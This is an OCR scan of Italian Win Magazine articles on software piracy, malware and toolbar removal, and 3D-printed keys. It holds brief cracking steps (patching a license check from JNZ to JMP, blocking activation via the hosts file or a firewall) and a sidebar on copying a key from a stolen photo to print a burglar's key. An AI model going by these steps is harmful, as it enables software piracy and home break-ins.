Come abbiamo visto, i pirati informatici, sfruttano 
bug, falle di sicurezza ed eseguono il reverse 
engineering dei software commerciali per rea¬ 
lizzare i cosiddetti "crack* rilasciati poi sui canali 
underground della Rete. Il più delle volte creano 
un nuovo eseguibile del programma dopo aver 
eliminato la routine di registrazione da quello 
originale; altre volte estrapolano l’algoritmo per 
compilare un keygen che consente loro di genera¬ 
re seriali accettati dal programma come validi. In- 
somma, la lotta tra software house e pirati è sem¬ 



pre accesa; tant’è che 
le prime si impegnano 
ad introdurre sistemi 
antipirateria via via più 
sofisticati, come chiavi 
di protezione hardware 
e controlli di genuinità 
su server remoti. In par¬ 
ticolare, questi ultimi si 
eseguono all'avvio del 
software e in presenza 
di connettività Internet. 

Molte applicazioni inte¬ 
grano il controllo della 
licenza nella procedura 
di update del software; 
in questo modo, quan¬ 
do l’utente verifica la 
disponibilità di nuove 
versioni viene obbliga¬ 
toriamente controllata la genuinità del program¬ 
ma installato nel computer. 

I pirati, dopo aver applicato il crack al software, 
provvedono a bloccare nel file hosts di Windows 
XP i controlli di genuinità reindirizzando al lo- 
calhost del loro PC (che per tutti è 127.0.0.1) il 
collegamento al sito per l'attivazione dei prodotti. 
Con Windows Vista e Windows 7 tale sistema non 


funziona e devono ricorrere al firewall (anche 
quello integrato nel sistema operativo) crean¬ 
do una regola che blocca i file EXE del software 
commerciale. È così che riescono a compiere la 
loro malefatta. Insomma, ironia della sorte... uno 
strumento legale come il firewall di Windows, 
nelle mani sbagliate diventa uno strumento di 
hacking. 
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ai crack su misura fatti in casa 




^ Alla ricerca della stringa giusta 

2 II pirata procede con il filtraggio delle stringhe del software e, scorren¬ 
do la finestra, individua quella che riporta il testo registration, activa- 
tion o license per poi aprirne le relative istruzioni con un doppio clic del mou¬ 
se. Quindi individua quella che si occupa di verificare la licenza. 


L’attivazione dei software non serve più 

3 In questa stringa il pirata sostituisce JNZ con JMP e riassembla il 
codice del software, salvando le modifiche dal menu contestuale 
che appare. Chiude quindi la finestra di debug per apportare le modifiche 
all'eseguibile originale. Il crack è bello e servito! 



RISORSE SOFTWARE, TRA LEGALI E ILLEGALI 

Navigando su Internet è facile entrare in possesso di software pirata, ma anche cercare un'alternativa 
legale. Ricordiamo, però, che sui siti pirata virus e spyware non mancano mai! 


SOURCEFORGE 


THEPORTABLE 
FREEWARE COLLECTION 


GIVEAWAY 
OF THE DAY 


I SUPPORTI 
DIWINMAGAZINE 


http://sourceforge.net www.portablefreeware.comhttp://it.grveawayoftheday.com www.winmagazine.it 


Il più grande database 
di software open source 
esistente. Ci si trova di tutto 
e molti dei software offerti 
non hanno nulla da invidiare 
ai costosi programmi 
commerciali. 


Oltre ad essere 
completamente gratuiti, 
i software disponibili 
su questo sito coprono 
qualunque necessità senza 
nemmeno richiedere 
l'installazione 
sul sistema. 


Ogni giorno regala ai propri 
lettori le licenze di famosi 
software commerciali. Per 
non lasciarsi sfuggire le 
offerte, che valgono solo per 
24 ore, e possibile servirsi di 
newsletter e feed RSS. 


Approfittando delle 
promozioni che ogni mese 
troviamo nei supporti 
allegati alla rivista, avremo 
la possibilità di installarew 
e utilizzare gratuitamente 
e legalmente decine di 
software a pagamento. 


YOUTUBE 


www.youtube.it 

Fa specie vedere il famoso sito di video hosting annoverato tra 
le risorse più utilizzate dai pirati informatici per trovare software 
completi con tanto di codici seriali è YouTube. Eppure, sono sempre 
più numerosi, infatti, gli utenti che pubblicano sul portale di video 
hosting le guide in cui vengono indicati i passi per applicare il 
crack ai software commerciali: si tratta, di solito, di filmati con 
le schermate che mostrano la procedura seguita dal pirata per 
bypassare i sistemi di protezione dei software commerciali. In 
alcuni casi, invece, vengono indicati i link ai servizi di file hosting 
da cui è possibile scaricare il “pacchetto completo”. Non mancano, 
poi, gli utenti che, tra le note del video pubblicato, pubblicano 
direttamente il codice seriale in chiaro: il pirata non deve fare 
altro che copiarlo (Ctrl+C) e incollarlo (Ctrl+V) nel modulo di 
registrazione del programma. 
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La guida e i software per ripulire 
a fondo il proprio computer 
da ogni minaccia informatica 


Cosaci 

occorre 


O 

V FAOLt } 


ANT1V1RUS 

ESCAN TOTAL 
SECURITY SUITE 

Lo trovi su: «'DVD 
Quanto costa: € 60,00 

Sito Internet 

www.escanantivinjs.it 
Note: i lettori di Win 
Magazine possono 
usare Escan Total 
Security Suite senza 
limitazioni per 90 giorni 


ANT1JUNKWARE 


JUNKWARE 
REM0VALTOOL 


SOFTWARE COMPLETO 


Lo trovi su: ÉfiTVD 
Sito Internet www. 
bleepingcomputer.com 


DISINSTALLATORE 

REVO 

UNINSTALLER 


SOFTWARE COMPLETO 


Lo trovi su ✓DVD 

Sito Internet www 

ievouninstaller.com 


TOOL DI RIMOZIONE 

TOOLBAR 

CLEANER 

Lo trovi su ✓DVD 

Sito Internet: trttp -Jl 
toolbarcleaner.com 


S ono passati 29 anni da quando il virus 
Elk Cloner fece capolino negli hard di¬ 
sk di migliaia di PC in tutto il mondo. 
Eravamo ancora agli albori dell’informatica 
e quella prima minaccia infettava l'OS Apple 
II utilizzando i floppy disk per diffondersi. Per 
fortuna, l’infezione era del tutto innocua e si 
limitava a mostrare un messaggio di “saluto" al 
cinquantesimo riavvio del computer. Con questa 
sua iniziativa, però, il creatore del virus Rich 
Skrenta dimostrò che questi programmi male¬ 
voli non erano semplici licenze poetiche degli 
scrittori di fantascienza, ma rappresentavano 
una minaccia reale in grado di auto replicarsi 
se non sottoposti ad un adeguato controllo. 

Evoluzione della specie 

In tutti questi anni i nostri computer sono ri¬ 
masti esposti a minacce sempre più pericolose 
e dannose. Chernobyl, nato nel 1998, fu il primo 
virus capace di sovrascrivere il BIOS della sche¬ 
da madre. A Melissa e I Love You (nati rispetti¬ 
vamente nel 1999 e nel 2000) spetta il primato 
di essere riusciti a diffondere la loro infezione su 
scala mondiale. Sono cronaca recente, invece, 
gli attacchi dei worm Blaster, Sasser e Confi- 
cker, che in poche ore sono riusciti a infettare 
centinaia di migliaia di PC. Gli attacchi virali, 
comunque, non mirano solo a fare danni nel 
sistema: sempre più spesso il loro scopo è quello 
di rubare dati personali. Ecco perché ai ben noti 
spyware, rootkit e rogue software (i finti anti¬ 
virus il cui scopo è solo quello di creare danni 
al PC) si sono aggiunte le fastidiose toolbar che 
di "tool” hanno poco o niente. Invadenti e ad¬ 
dirittura pericolose, servono solo ad occupare 
spazio, veicolare annunci pubblicitari o cattu¬ 
rare i dati di navigazione. Riuscire ad evitare 
questi "parassiti” virtuali è molto difficile e lo 
è anche sbarazzarsene. Ecco quindi la guida 
per intervenire correttamente e debellarli una 
volta per tutte! 
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□ Installiamo il tool sul PC 


Per mettere in totale sicurezza il nostro computer come prima cosa eseguiamo il setup di eScan Total Security. 
Per fare tutto bastano solo pochi clic del mouse. 



Via con l'installazione 

•J Estraiamo sul disco rigido il contenuto 
dell'archivio compresso twn2k3ek.zip (lo 
trovi sul Win DVD-Rom) e facciamo doppio clic sul 
file tm2k3ekexe. Quando compare la prima scher¬ 
mata lasciamo selezionata la voce Italiano e pre¬ 
miamo OK. 


-x Accettiamo la licenza 

Nella schermata relativa alla licenza d'uso 
selezioniamo l’opzione Accetto I termini 
del contratto di licenza e facciamo clic sul pulsan¬ 
te Installa. L'antivirus verrà installato sul computer e 
sarà eseguita anche una veloce scansione dell’in¬ 
tero sistema. 


^ Pronti a usare il tool 

3 Al termine dell'installazione del softwa¬ 
re clicchiamo sul pulsante Sì per riavviare 
il computer. Ritornati a Windows, nella schermata 
Informazioni licenza eScan facciamo clic sul pul¬ 
sante Prova per cominciare ad usare fin da subito la 
versione trial a 90 giorni dell’antìvirus. 



Il mio antivirus è aggiornato! 


Se vogliamo contrastare in modo efficace tutte le minacce informatiche, vecchie e nuove, è fondamentale scaricare 
le ultime firme dai server del software. Ecco la procedura da seguire per completare l’operazione. 



Aggiorniamo le firme 

Per avviare lo strumento eScan facciamo 
doppio clic sull’icona Centro Protezione 
sScan che troviamo sul desktop. Successivamen¬ 
te, clicchiamo sul pulsante Aggiorna in basso per 
procedere subito con l'aggiornamento delle firme 
antivirali. 


Colleghiamoci ai server 

2 Nella schermata successiva immediatamen¬ 
te sotto la voce Configurazione possiamo 
visualizzare la data dell’ultimo aggiornamento. Per 
caricare le nuove firme antivirali facciamo clic sul 
collegamento Aggiorna Ora che troviamo nella stes¬ 
sa finestra. 


^ OK. upgrade effettuato! 

Il programma si collegherà adesso ai server 
per effettuare l’aggiornamento. Questa ope¬ 
razione può richiedere alcuni minuti a seconda della 
dimensione degli aggiornamenti. Al termine clicchia¬ 
mo su Chiudi e poi sulla freccia in alto a sinistra per 
tornare all’ interfaccia principale. ► 
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LE REGOLE 
DELL'ANTIVIRUS 


Le impostazioni pre¬ 
definite di scansione 
di eScan Total Security 
vanno bene per la 
maggior parte dei casi. 
Se abbiamo esigenze 
particolari, ad esempio 
escludere dalla scan¬ 
sione un dispositivo 
connesso al nostro 
computer o negare l'ac¬ 
cesso a determinati file 
memorizzati sul disco 
rigido, facciamo clic sul 
riquadro Regole Anti- 
rirus. Nella schermata 
successiva clicdiiamo 
sul link Impostazioni 
per selezionare le opzio¬ 
ni relative al rilevamen¬ 
to dei virus nelle unità 
disco del computer. Al 
termine premiamo OK. 


CONTROLLO 
SUL WEB 


eScan Total Security in¬ 
tegra anche un modulo 
di controllo parentale, 
molto utile per evitare 
che i bambini visitino 
pagine Web caratteriz¬ 
zate da contenuti non 
adatti alla loro età. Per 
attivare questo servizio 
dall'Interfaccia del 
programma dicchiamo 
su Controllo Contenuti, 
quindi su Start Parental 
Control. Allo stesso 
modo e dalla stessa 
schermata possiamo an¬ 
che abilitare il filtro che 
impedisce di impedisce 
al browser di aprire siti 
che possono contenere 
codice pericoloso per 
la sicurezza del nostro 
computer: per farlo 
dicchiamo su Start Mal- 
ware Filler. 



Mai più virus sul PC! 


Una volta installato e aggiornato eScan Total Security possiamo utilizzarlo per eseguire una 
scansione del sistema e delle unità disco connesse al computer. Vediamo come fare. 



Avviamo la scansione 

■J Dall'interfaccia principale del programma facciamo clic in 
basso a sinistra sul pulsante Controlla per eseguire una 
scansione antivirus del nostro computer. Nella finestra che com¬ 
pare possiamo a questo punto scegliere la cartella o il dispositivo 
da controllare. 



L’analisi del sistema 

2 Per eseguire un controllo della memoria e del sistema 
facciamo clic su Controllo Memoria, Registro, Senrizie 
Cartelle di Sistema. Nella finestra Opzioni che compare lasciamo 
invariate le impostazioni predefinite e avviamo la scansione con 
un clic su Controllo. 



^ Un controllo personalizzato 

Se invece vogliamo effettuare un contro antivirus dei dai 
memorizzati sul disco, nella schermata del Controlla fac¬ 
ciamo die sul link Controllo unità Disco Locali. Invece, per un con¬ 
trollo personalizzato, ad esempio di cartelle specifiche, facciamo 
die su Controllo Personalizzato. 


^ Cartelle del disco sotto la lente 

^ Nella finestra successiva lasciamo selezionata l’opzio¬ 
ne Controllo cartelle e file seguenti e dicchiamo sul 
pulsante Sfoglia. Mettiamo con il mouse un segno di spunta 
sulle cartelle che vogliamo controllare e premiamo OK e poi 
Controllo. 



^ Operazioni pianificate 

(j Se vogliamo eseguire sul nostro sistema delle scansioni 
pianificate (ad esempio una volta al mese oppure ogni 
lunedi alle 9.00) dalla schermata Controllo dicchiamo su Pia¬ 
nificatore. Nella finestra che si apre facciamo clic sul pulsan¬ 
te Aggiungi. 


^ Scansioni settimanali 

g Nel tab Operazione digitiamo un Nome per l’operazione. 

Andiamo nel tab Pianificazione e, per effettuare una scan¬ 
sione ogni settimana alla stessa ora, selezioniamo Ogni settimana, 
dicchiamo Giorno per scegliere il giorno desiderato e selezioniamo 
l’ora. Premiamo Salva e poi Chiudi 
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O Rimuoviamo le inutili toolbar 


Promettono navigazioni sicure ma finiscono per appesantire il browser. Col nostro kit pulisci tutto te ne liberi 
una volta per sempre e potrai tornare a sfrecciare su Internet senza inutili fardelli. 



^ Il tool automatico 

Le toolbar e altri add-on che infastidiscono e 
rallentano il browser sono generalmente legati 
a programmi installi sul PC. Con JRT possiamo rimuo¬ 
vere quelli più diffusi in un colpo solo. Estraiamo l'ar¬ 
chivio JRTzip (lo trovi sul Win DVD-Rom) ed eseguia¬ 
mo il file JRT.exe. 


a Basta un tasto 

2 Chiudiamo tutti i browser in esecuzione e 
"" avviamo il processo premendo su un tasto 
qualsiasi. JRT analizzerà servizi e processi collega¬ 
ti ad add-on e toolbar rimuovendoli automaticamen¬ 
te. Poiché alcuni software potrebbero sfuggire a JRT, 
completiamo la rimozione usando Revo Uninstaller. 


Per i software ostinati 

3 Estraiamo l’archivio RevoUninstaller.zip (lo 
trovi sul Win CD/DVD-Rom) ed eseguiamo 
Revouninstaller.exe. Selezioniamo il software sospetto 
e scegliamo Search at Google for. Potremo così sco¬ 
prire la natura del software e poi avviarne la rimozione 
con Uninstall. 



^ Installiamo il software 

4 Ora che abbiamo eliminato i software è il 
momento di passare alla rimozione delle tool- 
bar installate nel browser. Installiamo Toolbar Cleaner 
(lo trovi sul Win DVD-Rom) assicurandoci di rimuove¬ 
re le spunte dalle caselle Protect my System e Set 
MyStartashomepage. 


^ Toolbar ed estensioni 

Ij In Toolbar Cfeanervengono elencati i browser 

presenti sul PC e le toolbar/estensioni installa¬ 
te. Spuntiamo le voci relative agli elementi (toolbar ed 
estensioni) da rimuovere, cucchiamo Remove Selec- 
ted Toolbar (OK), quindi rispondiamo Don’trun alla 
richiesta di aprire il Pannello di controllo 


^ Puliamo anche il registro 

0 Per debellare definitivamente eventuali residui, 
oltre che ripulire il browser possiamo ricorre¬ 
re a CCleaner (lo trovi sul Win DVD-Rom). Avviamo il 
software e cucchiamo Avvio pulizia {OK), dopodiché 
spostiamoci su Registro, cucchiamo Trova problemi 
e Ripara selezionati. 



^ L’antivirus non basta 

Solo gli antivirus più efficienti sono in grado di 
rilevare le minacce contenute in molte toolbar 
e componenti aggiuntivi che s’intrufolano nel browser. 
In ogni caso, una scansione con MalwareBytes (lo trovi 
sul Win DVD-Rom). Quindi installiamolo seguendo la 
semplice procedura guidata. 


^ L’incubo dei malware 

0 Prima di completare l’Installazione togliamo la 
spunta da Attiva la prova gratuita. Avviamo il 
software, aggiorniamo il database, procediamo con la 
scansione ( Scan now) e rimuoviamo le minacce (Qua¬ 
rantine All e Apply Action). Ora ripristiniamo la pagina 
iniziale e il motore di ricerca del browser. 


^ Un browser rinnovato 

0 In Internet Explorer cucchiamo Strumenti/ 
Opzioni Internet/Avanzate/Reimposta. In 
Chrome cicchiamo Impostazioni/Mostra impostazio¬ 
ni avanzate, poi Reimposta impostazioni del brow- 
ser/Riprìstina. In Firefox digitiamo aboutsupport nel¬ 
la barra degli indirizzi e clicchiamo Ripristina Firefox. m 
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■ Con una semplice stampante 3D (nella foto un modello di RepRap) è possibile 
creare facilmente il duplicato di una qualsiasi chiave! 


Le stampanti 3D aprono un 
mondo intero di possibilità... 
compresa la tua porta di casa! 


C hiavi, hacker e sicurezza: tre parole che, 
affiancate, ci catapultano immediatamente 
nello spazio virtuale. Un mondo astratto 
in cui personaggi dai nomi bizzarri cercano di 
accedere a dati segretissimi, immagazzinati in 
forma digitale e protetti da firewall apparen¬ 
temente invalicabili. Nulla a che vedere con 
il problema di chiudere bene la porta di casa 
prima di andare a scuola o al lavoro, giusto? 
Non esattamente, come stiamo per scoprire. 

Gli hacker della porta accanto 

Il rinnovato successo della Realtà Virtuale è 
solo uno dei numerosi segnali di un cambia¬ 
mento già in atto, in cui i confini tra ciò che è 
reale e ciò che non lo è tendono rapidamente a 
svanire. Se la realtà virtuale cerca di trasportaci 
“fisicamente" nel cyberspazio, la stampa 3D 
mira a rendere tangibile ciò che fino a poco fa 
era confinato nel mondo dei bit. Entrambe le 
tecnologie stanno progressivamente lasciando 
i laboratori di ricerca per rifugiarsi nelle case 
degli appassionati, dove trovano applicazioni 
alternative e spesso sorprendenti. La possibilità 
di stampare da sé i propri oggetti non ha portato 


■ virtuali, 
furto reale 
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solo alla riscoperta dell'arte della gioielleria, 
ma anche a quella di attività artigianali, quali, 
ad esempio, la creazione di chiavi più o meno 
personalizzate. Il problema, in questo caso, è che 
le attuali tecnologie casalinghe non sono l’ideale 
per oggetti destinati a sopportare ripetuti sforzi 
meccanici. Anche supponendo di riuscire a rea¬ 
lizzare una chiave perfettamente funzionante, 
quindi, la sua durata sarebbe per forza di cose 
limitata. E a chi potrebbe servire una chiave 
che si può utilizzare poche volte o, addirittura, 
soltanto una? Ecco che, aH’improwiso, la figura 
dell’hacker si sovrappone a quella del ben più 
classico topo d’appartamento! 

Bump key, tradizione criminale 

Mentre la sicurezza virtuale si confonde con 
quella reale, le nuove tecnologie riportano alla 
ribalta tecniche truffaldine che si credevano 
ormai debellate. Lo scenario è inquietante: per 
correre ai ripari sarebbe bene fare un salto alla 
tradizionale Lock Con, dedicata interamente alle 
serrature. Come si cura di precisare la pagina 
ufficiale, la conferenza è frequentata in egual 
misura da tecnici della sicurezza, hackers, spie 
e, occasionalmente, belle ragazze (https://toooL 
nl/LockCon). Accedervi però non è semplice 
(potrebbe essere altrimenti?), visto che l’ingresso 
avviene solo su invito. Per consolarci, possiamo 


sbirciare i progetti più interessanti su Internet. 
Tra le novità di quest'anno, merita un’attenzione 
particolare Photobump, un software che si pro¬ 
pone di colmare il divario tra la teoria e la pratica 
delle bump key (w\vw.winmagazine.it/link/2817). 
Le serrature a cilindro sensibili al key bumping 
sono talmente numerose che la tecnica viene 
presentata addirittura nella pagina di Wikipedia 
dedicata a queste chiusure (www.winmagazine. 
it/link/2818). Bump, in inglese, significa colpire: 
le bump key sono infatti speciali chiavi proget¬ 
tate... per essere prese a martellate! In questo 
modo, si riesce a ottenere l’allineamento dei 
contropistoncini presenti nella serratura che, 
in teoria, dovrebbe avvenire solo inserendo la 
chiave originale. Il risultato è che la serratura si 
sbloccherà docilmente, senza riportare nessun 
segno di scasso. Si tratta di un metodo che non 
richiede abilità particolari, il cui utilizzo pratico 
è però limitato dalla difficoltà di procurarsi delle 
bump key adatte. Queste chiavi, infatti, devono 
potersi adeguare al profilo della serratura e avere 
i "denti" nella giusta posizione, benché tagliati 
alla massima profondità (indicata con il valore 
9 nelle macchine duplicatrici di chiavi che tro¬ 
viamo presso tutti i ferramenta). A quanto pare, 
Photobump consente di progettare chiavi 999 
partendo da una foto della serratura e da pochi 
altri dati, relativamente facili da recuperare. Il 



■ Una chiave 999 progettata con Photobump. In 
questo caso i "dentini'' sono stati scavati a mano. 


modello virtuale della chiave però non basta e 
portare il file dal negozio di ferramenta sotto 
casa potrebbe destare qualche perplessità È qui 
che entra in gioco la stampa 3D, che consente al 
potenziale hacker d’appartamento di c omple- 
tare il progetto nell’intimità del proprio garage! 

Generatori di chiavi... fisiche! 

Cercando key generator su Google otterremo 
una lista praticamente infinita di “chiavi’’ che 
ci promettono di sbloccare programmi d’ufficio, 
videogiochi, reti Wi-Fi e sistemi operativi Nessu¬ 
no, però, sembra offrirsi di aprire la nostra porta 
di casa. La notizia sembrerebb e tranquillizzante, 
ma la verità è che stiamo semplicemente cercan- 


Tre passi e ti duplico una chiave 

Incredibile, ma vero: ad un ladro di appartamenti bastano la foto di una chiave, un software gratuito di 
modellazione 3D e uno script pronto all’uso per realizzare un passepartout e aprire così qualsiasi serratura! 



-x Foto rubate di una chiave 

Aver accesso a software come come Pho- 
tobump o Sneakey è difficile, ma scattare 
una foto col cellulare, per il ladro di appartamenti, è 
semplicissimo! L’inquadratura dev’essere parallela al 
piano di appoggio. Una volta a casa al sicuro, il ladro 
avvia OpenSCAD (www.openscad.org). 


^ Ricalco narametrico 

2 Scaricato lo script di Belfry (www.thingiver- 
se.com/thing: 162932), il ladro lo carica in 
OpenSCAD ( File/Operì) e genera la chiave di base 
[F5). Raddrizzata la foto con un editor grafico come 
GIMP, adegua la vista ( View/Topo Bottoni) e la rical¬ 
ca modificando i parametri a sinistra. 


^ Chiavi in mano 

0 Una volta realizzato il modello tridimensiona¬ 
le, al ladro non rimane altro da fare che darlo 
in pasto alla sua stampante 3D. E se non ne ha una 
disponibile, si rivolge a servizi on-line come Shape- 
ways (www.shapeways.com) che gliela recapitano 
direttamente a casa. Fatto il misfatto! 




► 
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LOCKCON 

Conferenza intemazio¬ 
nale interamente dedi¬ 
cata a chiavi e serratu¬ 
re. Ospita presentazioni 
di prodotti innovativi 
e unici e durante i suoi 
lavori si svolgono anche 
campionati di lockpi- 
cking sullo sbloccaggio 
delle serrature stesse. 

È un luogo, insomma, 
dovei top lockpickerssi 
incontrano per confron¬ 
tarsi l'un l'altro. 

KEYBUMPING 

È una tecnica utilizzata 
per aprire le serrature 
a cilindro di porte e 
lucchetti con un'appo¬ 
sita chiave “ad urto". In 
pratica, nella serratura 
viene inserita una 
chiave appositamente 
limata da utilizzare 
come tensore. La stessa 
viene poi colpita con un 
martelletto per far si 
che la forza d'urto alzi 
i pistoni superiori della 
serratura sbloccandola. 

FOTO 

GRAMMETRIA 

Particolare tecnica di 
rilievo che permette di 
acquisire dati metrid 
di un oggetto (forma 
e posizione) mediante 
l'acquisizione e l'analisi 
di una coppia di foto¬ 
grammi stereometria. 
Viene utilizzata in 
cartografia, topografia 
e in architettura, ma 
sempre più spesso an¬ 
che per la stampa 3D. 

HOMEBREW 
COMPUTER CLUB 

Rimasto attivo dal 5 
marzo 1975 al dicembre 
del 1986, il dub racco¬ 
glieva appassionati di 
computer (in inglese, 
homebrew significa 
"fatto in casa") che 
discutevano di tecniche 
per lo sviluppo dei pri¬ 
mi PC. Trai membri più 
illustri si possono anno¬ 
verare anche Steve Jobs 
e Stephen Wozniak, 
fondatori della Apple. 


do nel posto sbagliato. Questo genere di 
imprese viene studiato all'interno della 
comunità dei maker, i nuovi artigiani 
digitali. Proviamo a ripetere la stessa 
ricerca su Thingiverse (www.thingiver- 
se.com) e ci ritroveremo di fronte a uno 
scenario diverso. Come nelle migliori 
comunità hacker, qui la parola d’or¬ 
dine è “condivisione”: al posto dello 
sfuggente Photobump, avremo quin¬ 
di a disposizione degli strumenti con 
cui giocare in prima persona. L’utente 
Belfry, ad esempio, ha pubblicato uno 
script che promette di generare modelli 
di chiavi pronte per la stampa 
(www.winmagazine.it/ 
link/2819). 11 tutto 



è scaricabile senza bisogno di registra¬ 
zione. Per vederlo all'opera dovremo 
solo aprire il progetto in OpenSCAD, 
un software libero disponibile per Win¬ 
dows, Mac e Linux (www.openscad.org). 
Lo script è ampiamente commentato, 
quindi potremo divertirci a modifica¬ 
re i vari parametri per generare chiavi 
sempre diverse. L’obiettivo, in questo 
caso, è realizzare un esatto duplicato 
di una chiave già in nostro possesso. 
L'autore consiglia di scegliere una vista 
ortogonale dall'alto, accostare la chiave 
allo schermo e aggiustare con calmal'al- 
tezza dei “dentini". Belfry annuncia 
di essere riuscito a duplicare la 
chiave della propria cassa¬ 
forte di casa, esperienza 
che, confessa, trova 
un po’ inquietante. 
Lo script, naturalmen¬ 
te, consente di progettare 
con facilità anche le 
famigerate bump 
key: basta im- 


■ Se possediamo un iPhone, l'app di Key Me 
potrebbe aprirci molte porte (forse troppe!) 


postare a 9 il taglio di tutti dentini! 

Sbircia quella chiave! 

La necessità di possedere la chiave ori¬ 
ginale rende lo script di Belfry più adat¬ 
to agli esperimenti che a vere imprese 
criminali. Se, ancora una volta, stiamo 
tirando il fiato, non saremo contenti di 
scoprire quanto accade nella prestigio¬ 
sa lacobs School di San Diego (www. 
jacobsschool.ucsd.edu). Stefan Savage, 
insegnante di Informatica, ha infatti 
messo a punto un software in grado di 
ricostruire il modello di una chiave a 
partire da una qualsiasi fotografia, an¬ 
che scattata di nascosto! Il programma, 
realizzato in MatLab (www.mathworks. 
it/products/matlab), si chiama Sneakey 
(sneak significa "intrufolarsi") e mette 
seriamente in dubbio molte delle tra¬ 
dizionali certezze sulla sicurezza delle 
chiavi fisiche (www.winmagazine.it/ 
link/2820). La sua prima versione risa¬ 
le a qualche anno fa (2008): da allora, 
le fotocamere degli smartphone sono 
migliorate. Se è vero che le stampanti 3D 
potrebbero rappresentare il nuovo “re¬ 
galo tecnologico" di Natale, la minaccia 
di Sneaky è quindi più attuale che mai! 


GLI SCASSINATORI IN 3D FINISCONO IN TELEVISIONE 


Una serratura aperta a regola 
d'arte e senza traccia di scasso 
possiede un fascino antico, 
che non poteva certo sfuggire 
agli sceneggiatori hollywo¬ 
odiani. Per un'introduzione 
alle tecniche di base, la scelta 
giusta è"The NextThree Days", 
pellicola del 2010 in cui l'arte 
delle bump key ci viene mo¬ 
strata da Russell Crowe, qui 
nei panni di un marito deci¬ 


so a far evadere la sua dolce 
metà. Qualche anno prima, 
nel 2006, fotogrammetria e 
stampa 3D avevano unito le 
fòrze per dar vita alle masche¬ 
re ultra realistiche di "Missioni 
Impossible 3". Se il salto in 
avanti della pellicola di Tom 
Cruise ci sembra eccessivo, 
faremo bene ad accendere la 
TV. Il piccolo schermo sembra 
infatti essere il luogo giusto 



■ Basta una foto su un giornale per smascherare i veri bugiardi. 
Parola di Usa Simpsonl 


per mettere d'accordo tradi¬ 
zione e innovazione. 

Crimini 3D in TV 

Il punto di partenza ideale 
del nostro tour televisivo è 
"Il quinto uomo", ventesimo 
episodio della quinta stagio¬ 
ne di "Numb3rs" (2009). Nel 
corso della puntata assistiamo 
a un'operazione di telerileva¬ 
mento di una chiave in per¬ 
fetto stile Sneakey, tanto da 
far sospettare unlspirazione 
diretta da parte degli sceneg¬ 
giatori (www.winmagazine. 
it/link/2822). Nel 2009, il ta¬ 
glio laser era stato utilizzato 
dalla mitica auto senziente 
KITT per duplicare le chiavi di 
una Lamborghini. Accadeva 
in "Viaggio verso la fine del 
cavaliere", secondo episodio 
dello sfortunato remake di Su- 
percar (in originale Knight Ri¬ 
der). A battere tutti sul tempo, 
almeno sul fronte della stam¬ 


pa 3D criminale, è però "CSI: 
New York", che già nel 2005 
ci mostrava come applicare 
le tecniche di prototipazio- 
ne rapida alla realizzazione 
di un proiettile (l'episodio è il 
nono della prima stagione,"Il 
cecchino"). Per completare il 
progetto e realizzare un'intera 
pistola dovremo attendere 
l'ultima stagione (2013), la cui 
undicesima puntata si intitola 
“Stampante 3D". La carrellata 
di esempi è facilmente am¬ 
pliabile: se vogliamo buttar¬ 
ci alla ricerca di nuovi spunti, 
non limitiamoci a esplorare le 
serie "gialle". Le sorprese più 
divertenti sono altrove: chi 
avrebbe mai immaginato che 
l'inappuntabile Lisa Simpson 
si potesse servire di una foto 
su un giornale per replicare 
la chiave della stanza segre¬ 
ta della scuola elementare di 
Springfield? Le prove nell'epi¬ 
sodio "500 chiavi"del 2011 ! 


90 Win Magazine Speciali 











Chiavi 3D | Per saperne di più 


A scuola dì hacker 



SIAMO RIMASTI CHIUSI FUORI? CI PENSA LO SMARTPHONE 


Mentre ci prepariamo a barricarci 
in casa, o quantomeno a tenere 
sempre ben custodite le chiavi del 
nostro appartamento, saremo felici 
di sapere che le tecniche di dupli¬ 
cazione fotografica possono essere 
impiegate anche in situazioni meno 
estreme... e decisamente più legali! 
Key Me (https://key.me) è un'ap¬ 
plicazione gratuita per iPhone che, 
appoggiandosi ad un servizio on-line 
attivo al momento soltanto negli Sta¬ 
ti Uniti d'America, permette di usare il 
proprio iPhone per conservare e con¬ 
dividere con gli amici e i parenti più 
fidati una copia delle chiavi di casa. Il 
suo funzionamento è semplicissimo. 
In pratica, usando la fotocamera dello 
smartphone l'app permette di realiz¬ 
zare una scansione delle nostre chiavi. 
In caso di smarrimento, basterà richia¬ 
mare la copia dall'archivio dell'app e 
recarci presso uno dei ferramenta o dei 
chioschi interattivi che supportano il 
servizio per farci fare un duplicato reale 
della chiave stessa. In alternativa, se 
siamo rimasti chiusi fuori di casa pos¬ 
siamo usare Key Me per mandare un 
messaggio al nostro partner chieden¬ 
do di inviarci una copia della chiave. Il 


■ È sufficiente aprire la scansione della 
chiave e recarsi presso uno dei chioschi 
interattivi compatibili con il servizio Key 
Me (https://key.me) per farsi dare un 
duplicato reale della chiave stessa. 


nostro interlocutore non dovrà fare altro 
che eseguire una scansione della chiave 
utilizzando la stessa app e inviarcela (su 
www.winmagazine.it/link/2821 il video 
che illustra il funzionamento di Key Me)! 

È sicuro condividere 
le proprie chiavi? 

Molto simile a quella di Key Me è l'offerta di 
Keys Duplicated (https^/keysduplicated. 
com) che, però, solleva anche gli stessi 
dubbi sui pericoli dell'eccesso di condi¬ 
visione. L'attuale tendenza “sodar della 
Rete fa sì che il problema sia destinato a 
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crescere. Siti come Please Rob Me (il suo 
nome significa, letteralmente:'perfavore 
derubami”) sono nati proprio per aiutarci a 
indi viduare ciò che è meg lio tenere privato 
( http://pleaserobme.com). I generatori di 
chiavi di casa, infatti, sono solo un assaggio 
di ciò che ci attende nel prossimo futuro. 
La nascente'lntemet delle cose”sarà com¬ 
posta da una miriade di oggetti in grado 
di dialogare tra loro. L'idea di comandare 
la lavatrice via smartphone potrà anche 
essere affascinante, ma venire spiati dalla 
telecamera della propria Smart TV lo è un 
po' meno, quindi prestiamo attenzione! 
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Bottle Opener 


First Key: $5.99 


30% * off MtfUonaf keys 
Free shopping* 


AOD TO ORDER 


■ L'app Key Me utilizza la fotocamera delUPhone per effettuare una scansione 3D delle 
nostre chiavi e creare un archivio facilmente consultabile dallo smartphone stesso. 


DALLA MODA ALLE AUTOMOBILI: LA STAMPA 3D È DAVVERO SENZA LIMITI 


Anche mettendone da parte gli impieghi criminali, la 
stampa 3D sta dando vita a una quantità di applicazio¬ 
ni davvero sorprendente. L'aspetto più interessante 
è che molte di queste iniziative nascono "dal basso" 
e tendono a organizzarsi in comunità, sia reali, sia 
virtuali. Il fulcro di questo fenomeno è il maker, un 
appassionato capace di unire l'approccio astratto degli 
hacker con quello concreto degli artigiani. Sembra 
quasi di assistere alla rinascita del leggendario Ho- 
